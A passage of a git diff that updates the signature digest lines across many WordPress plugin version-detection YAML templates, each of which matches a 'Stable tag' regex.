4a0a0047304502210089fe812314efeac4ffc5d5f6dd2d6ef8153ab6fe126447b8cbd19317d51449f90220172e93f42afd657af7e94373327ee6309b1882531246677949e5fd374b490cd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 724b92926a..8964f45e56 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220681c726c6b1d043e9e9542e8f308b2a3760c39d3dfc23be758e208359c5a7d30022100847fe531f7b3248420a1d85ab28528ab205c46b4661b4173c3754b1c838465a9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e222f2e420fa5d99a7312d5275214530b82b647a71aab90e4829a265fe1f9763022100c18e6e3e12a52b99451c5d6b6ff39b51a12247aacb3c9f4d13e8d53d0f8c2cd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 549987a64b..112c116c59 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022062c3554f538b50918a7e244b549b7149963bab171dc975ebf04db333b282a4de022061959bdfb1c7bc412d5901e379496114ffcf3461e72c024ea9f1c47bd3dcc662:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bca33c3c2f832b854d178ffc0afc5a41fb44b9df7eae47144f74e074a719f62502210088e00de4930d2f1be4a02d1a33ebecbb90ec46a3b2374db9f98d21fe8a22488c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index f8e202dc39..6868f457dc 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008b9bcac660f69109d4b82075976ae13a6496a9c827221ade578a6a69dada1d4c02203e8e35b138bf7d4febaa69c52508984af7171d8920f08d74b6018e435f3f2540:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008f3dce6c285ba81a0e35b47d5494e9313754a1ad213b7f75bd47ec1f104c43db022100fb89deada412bcad33576b9fd759f0aee1f1501069e424940ecf6443cfffda00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index a9139040f2..b560a599fd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022100c75145c169fdd73772803f9eb9298f2b2809882fe64453b2a804a840143f1641021f2c7e62343070f1af71bc48416de1bbb8724a2c7891ba70093d692b48f69d1a:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440221008019a55ecf5177ae39499e2b9177ca3f2e49ebad21add633b287517e27e72264021f3ea9b803f3032d57d2340df298ef0ae9c16dfd441a31707a7320358139282f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index e55bf07256..dec9e9f034 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100eea326e299375de4fc3e8a067089132c4804bcbd20bd29614f26d4c009271a8802200afe66da298913bd556c968a6ab07ec7d01629d0d7bf812c6fa25ee2ddbf9faa:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e17e50cb96fb55c9802cc95b594b45cd46a49bbdc7634205fc7261990a67039e022100a6211c1101897118312bca19bb6d675036f4d5d0bc6545b0e40756b101de1438:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0f4fd6e20a..09b8d14df8 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220283532808a416990d541ec89be6fbfbeca5d4625d140e1a03bec5e45c10d468d02202833959ab2d2fcaf4dd40c101c407d272e4e1a1a680cbfe8291631fe1c55a673:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fefb1c26e156e9679ca4f6dbe18cd79ccfddf5254ca295155e1bfcea32fe7766022100e94579bb7ddc2671364f3f7a4494d9c5d6e74363a1ca998a6e3a92bd982b9a25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 82c44132b7..9b66f719ca 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204b0d5fd2fcf14f8a51f378b9b3a82bb09cc46bc8e6a8e31e7f6b75ef1769750202207eabc9af91c138fc37ab046ce5f854ff0ad5c272af1d71a183e71d6e8422cdaf:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202b48360af2dfe9fd74efca0265168313c828bd424bb13621e817a8d7e750a77802206d5647378742840e37a6adcc8f120d8405c0aea80606d548b9aa0ad152ce4b4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 60cf9e99a3..a322304828 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201d80126653c9ea98957c7e200f5dc444071b2807e0851a1fa9a40589ba26a7cd022017b0f868c67730a1364c34df22e6a7dae4b25c93e78e679e104d84f8448e48bc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d8b6cf76a8795a91481a24564dd523d38aed25bfeeb9d8fcbd0b70e63aaafd3a022013c232c84936a06f4b63db0604e32632869f0aa9b1696c337ea8112f0f7cf6ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index 5414a6195c..fc1d6bfb11 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206d190fb029f8b7c7af44c531d3ce2db3d591cb2ac1122d465d1b24a706100336022100a3876fdce6912a7461299b67ee7d40ec865aa5fa2c3c85de578892d1306b4199:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204f1ab2611108a78c623c244d3200ba9b3ec2d9b9cd42b3a2d880b044debe452b02202b8b69e761ea1b62a4b2d97cf648113531bd4d7344094e6c4b2169e63f59bf00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 7992152eeb..dc051c6ba7 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220772c07f84fc63f1c9739bac79f98b8a59285a3ac1eb93b7bc7164b1516f3c691022030cdbe9bfbc7b4d08eb42f93442a64f2d82a09c35c8942675b90c05701f69d37:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022068ea33c7f5587ee4559a2b6c0b91d8ffa1e682582b02d92bc3367c6c4949cf46022100f44a037c099b49d781c03590cf70070ceb500e60864971daa09c5132061e514b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index af1d2e65d9..ab9d402c56 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d076c2ef4b2f70c59d25bced773cb76873e05ead35aa7d1e680886308dff987e02204abf4be4b552298e29697788dcdb11231a38c56887aaefe8489d400a60b87b0e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fed2a6d009703e5af7066274f63dcd1b408adfe629234cf97b683a9fa1fd884a02200fd58b54e868598aeef18e69a23071a9fb501a4fe8eca6467ed12e21d2d27cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f14a2262e5..07a5c133a4 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022035636c788d6618089ef6ab2637a7a0f281b6ca9c11ddc17853f7cf2f783840b90221009509605eb2882e7a329808a6c817ec35398da0b39c21010f34db6ac5776055c7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008b626c2c6c2ad5b7ed0701059f904cbf08997c790a40f02bad6f766980d06b2a0220193e288b719d8742a4ed0d673b8fc2a124bcf3a770dbbb41e760f39657ffe954:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 2f694dc81f..ab40ee9531 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202105ebd370e924c550e236d1d8bf7b0aabe5806a941d22bfe2e78a840e247a11022100c81922261d2d63e9a29c072da3687c8af801f7adb406013beb408f8b8ebe3c51:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205cb054f292a42381427df1322f65992535b9dc2d7fefd8dee56be778790596a5022100aa549af0e469a1e62a67713da3a00590ebbda442235ec49e3a867f8f823ec086:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7ea6addf99..14a54d7e9c 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202bbaf10d61684bf4d13b7f2b7da7fcbbec6d412cd89198009354169e65c99ba102205d5f3d5e4b13e7264c92f6fdcf111f207e5aa5b11807bbd88c3245acc2211aee:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c344087c2faf1518ffa6a2f65be4d68a4820cd6a599bbef0d70bac57c21b00a6022100986c130edb0133f596d2b049a9d1f7b51b4265fa82f33a76163c0d173f8b76ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 6fea37db40..f780368fb7 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022041468c6328755035440be35c524baf8c88ee35798f4bfa5db3eefc16903fb113022061cd95b759f11062f376d8238367c339504a3b1e3ab5a055d4002ee5b5421dfa:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a08f70ebb6115419e8d160c946624701334eed9bf24d0643d8d3fa91a1ba38db02206eaff8b5aed6c90833bd3bceebdcada110e09aaa2cb014af8b664dab10a903b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 7364239232..5b0ae72564 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009bc9075ea0d8480810cd61917b7aa7dc9c18d280a6b71ca9850cbcc7bfb4d6e702203f6c5bdfe8bcadbc84761dad65e0b8c1a05fdeb27c229381dfe1123fdf5d47cb:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202095a4e722712ff8ccf890e9d1451d33ed4d30f177399b703dcdb5a4ae7cf1bc02203f2a95db372d5aebbce852c515e1930ae35aac4c064940270fd79f2f0c51dd83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 3f2ac1c633..b4db0194f2 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204d1251f5b7d6556cc909ee66b939b1c7b33ac1419366031a935b56ee6650cee102204c9bf80fb49ac8d2759010028ac5b999c61193a3e064271bb11ab0584762ec9f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201207077ce740ff80dbc6e344cf043ac55695657a471cfc5346e023a7b529099702207bb127523ed49eebed8d17c931926a1236f5af1abccdd5f4240c34064684852a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 62c477691b..1bdac39242 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220623f6c10b67a593245ec74ef6af8ec04187e3c3f5f1e461054764ce92fcdd00d022029834a82390df5e2740b3db0ba98c25685a66a56c1e82d09c035e4ddff4d885b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ca9787c334b70e53ce7f044752e98afa2159159d5ae2d06749a8f38db7513d1902205b920ffda2d3869243d580db95e39339a40a269a670c660e14f8b7eb92239061:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index b00f7c3ed4..893b963fe0 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203da0d1030d67f46a79614b7ccdaa9d43b8cdf254f2964622bbb1df4b911a550c022100d5439a6c3f2eac13b23eca375ca650d5052f47125af6ff6ab3c7d57d21a6a0a8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220329bf4e6b5f3c66327debde9adfb38d9c37e9ec83c7768dd349350ec4fc244910221008c7970d277bbad0fd1f2882c6e01a4ad67f7369d881874a894378c4952193fa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 58514bea3d..db9a80df54 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204a300954552ab0adc8f54a358a00b8a4ee1ca781300b4f2ba67c04228f6151bf02205a3ba9bc507795d6656b51e0cbed84913e245fcac01b6a23739abaaa6fe0578e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fc9a45c2a6c7c1fdc20bf092cd243340fcf1371bc96edb9bcd02d21081f3ad79022011d7fdb5ddf887228d8cf0cafd25d0016050755718e67dc89c1233f11705e533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 633372d8cd..577b62c312 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221009e5d5a4fda900f44f5eea40711d1101d6a9c17d888d636f22d05dac17bd0df0f02210083672987cf3308dac6bc2fa28cc35a9e4a24d78524d23291098542b919bd0c45:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200140d4533227485eaf17e5b544549a96a2abbed49629720b8c8fc9c8f7e2d3580220301860ada97bad32316efe7c800d9918f9177a9347bbe492e4137a34e88e505c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 9348a77367..6cd1c77aa0 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202d3875de519dcb1af43843ed9ad690f7628abdd35f06d714d6593520499257cb022100d21163fb7d822be5752532bb33d2c6178e9333ef44043f756a8a3bffe09a051c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e05d517d9c402509af26d062040b3f0d37b1ed531a74b494cbaf6ef0a7738da502203679e778105fb680ba0fc57ca8a8158c942f0cb64a1151c138f09c5e2cacbfde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 3ea3de0756..47300ac603 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022012a771fbe75ecfbed562373413d3c5e1a34b4658ca5d0d81eb944e6bfa4048060220260f7eee3c535fb57788d8f7f5b1d6f089aad99393ae61c36cc9d6928c074cb4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203f047ca8a2be0a053fd7ccf09fc672aad9040421f516aeafc97a2faf0300cfd1022100e8617a978d2642e14f8e8e50ab68dc28b5feb0610e6ed53795bc9e07c62facb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index b015de815f..afce55d2dd 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f5cd7a36081b4021c1417a4fcae3c17a4814396a1818e56d022354ca957d62a102210082dbd04bbeb542fa6fbe33f29be99c75e8542da81c4632a4ef9913710ab3a823:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bf43f9792065edd8bd469c1c78edc3ade021015476e4b8bd9ddf27ed50cc9e040220017f632d6c60bb422c7aada00bc08134dc94f4718ff4f98814fc135e17e5b09c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index f023aaf91c..abe321cdd3 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207f7b364303cc1c412bcdc775149305ab446a01b406de392df65fe0b8a6621e2702206731b35b9265dc8e96ed99f25b356a556e95cfde6bcd0c073fb0fb81d9ac20b0:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220413ca48301c116ab14800580c23c5f88d5a18a951a599f4bcb380f5994417a7c02202e9795d8f4d7b59271f991091a63614af7004f0a0a985a1a1e6d11afd356d17f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 5125989a3e..631a9e7ee6 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502205f18fb63c091ad717eaaaa3abaaa56949b1840637fc4f6a72e57af81baecdeee022100e3233ec816a48c6d1b72229585ad8cb9485837d1e50a0b815d76606f8b6da3d7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100982e2338d081824d7f81921cd11bf04daead57fa2df7570bc1c5080bc5bd8195022100c5f060951dca96ee5ed86c15f34a8ba506fd212c6bad829cbebbc356eeab547a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 2608f89194..3cfa7f4744 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e552b30dc45ab03f8ff8bb513bb75939198c9c47fc7b719bc823386b90d3959102204eb278b4aafbd9a6b7771a923e5a0026172f1bfbce2bbcd46abd16e4bf93c9e8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100eac4edf585e24c4c1c91ad96dd8dadc99175e80ffc2f9dde9aacba140b2ecc350220118127bf175a8e3717888df7e4e18bda0f197b3edd10f6070859d8e08ddccd60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index c977acb993..eb78c24f17 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201d4e9d4f412666d0d435c4eecc09e3da7a2b14970b478dff444b34317f0e304002210099133864b533055dcf9829e3aa7471e27b639c92fd84a1bbe35b6ffcb61a9ea2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220431e534c69d0d8e18a800a1e9e9021a484921a3e20f990be30059df2cd499dec022100faae99b7649a41b16b671583458e027b923408bdbd4a7858f39b279462aae4bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 0f85ef1f9c..f9c8abd9ea 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201c4e5a1c3c089fccb91a553d40a59ccb4ee9e46b271e962dbd733fec6e056ddb02200e56dedb98e908503f8a80e2eda83220f7d430beaca6f21613fce9730e246405:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201713bfd66a34f8e483cccabd4477a43d358c01ef12de37339cb426420e617753022100d8e34c9ac11ad33154b6233fdbd52bfe215705f336fa41704bad58b58f1d8a20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 1137463fce..2ca5882927 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210081c1d7523b7068173e5305c6cc5f1d2fbf653c48746258493fe6347892bd9f3c0221008b54d6e99c7cef1061fdce38c61c9204a49b3e54b09353175000c10e312331ec:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022072e072f15cb876906c170b1975c652145a68d1b07fdfb42b373542a2af590e8102207f2d512d385157d52d18d0c14f05c8140004ffc17a0c59f7811a822e8cc0f78e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bb4d7b94f1..515f30ab52 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502205c2591f7f54a86e06a1ed8b06e00e6680e968027015d2582a6fa4119c9ae6a5a022100e203276eb8fc24fa62b04f867487e0d74982c8ce676af7ca87f353baf09fdd29:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100952ca2368789eda49de1deaa0d6c24b093e9ef49d9850822d5559b621f25bff2022100b981cfe2092696808cc21ea980fb630383454cf7b2040528c5685e688f691577:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 0da9f9f6e2..16cb7da365 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c5d239fd8a57406f52a1ce990a872d11d561ff990846ce3134359ac8af7fefeb022100a8040c957a0c5565c09ccbd4bf082f75c5c2f65b93f79dbded883d4aa82011c0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203691cdff2957bb89ee7805fed33e145577e788f1321507e0eee6a9982568e7ad022100f4070198663eaac6f6be8f66d97a6f2b25713fe653aba4c9df83badff2197280:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 0812e7d08e..80244db76e 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fa48c1c7493f0ae1d898b1b27d9aa511452086a8341d26e25ddf8cccd614eaad022017efb9468118a567b0b14007098585c888653cd8bf52d7df9a8c65b368e79286:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204152794c44df62d1facdadba0f41b0957cba12f5e2fceb10779152ee061edd3c022100f49dadda003fc0559cb8053909510f09c421ded56480e757ff0ddb85a0c4b0ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a84734b32e..c10f3d4b2c 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008329befa72cac3d2ed932242a20827d01373a3fa9591c4d35e7ae149badd2cc0022020b18f02212dfc4850d7212358ec91d01a3bc921a6e1d51601d31eb43f660abc:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220182105f90da417bb077d30f3fc511bd0c3b7739245742ddae65e435bfda60e6e02202c3e8be9629b536d05f0e6b804ef97896fb90b90f8cbd96a34f457c9f33d31c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 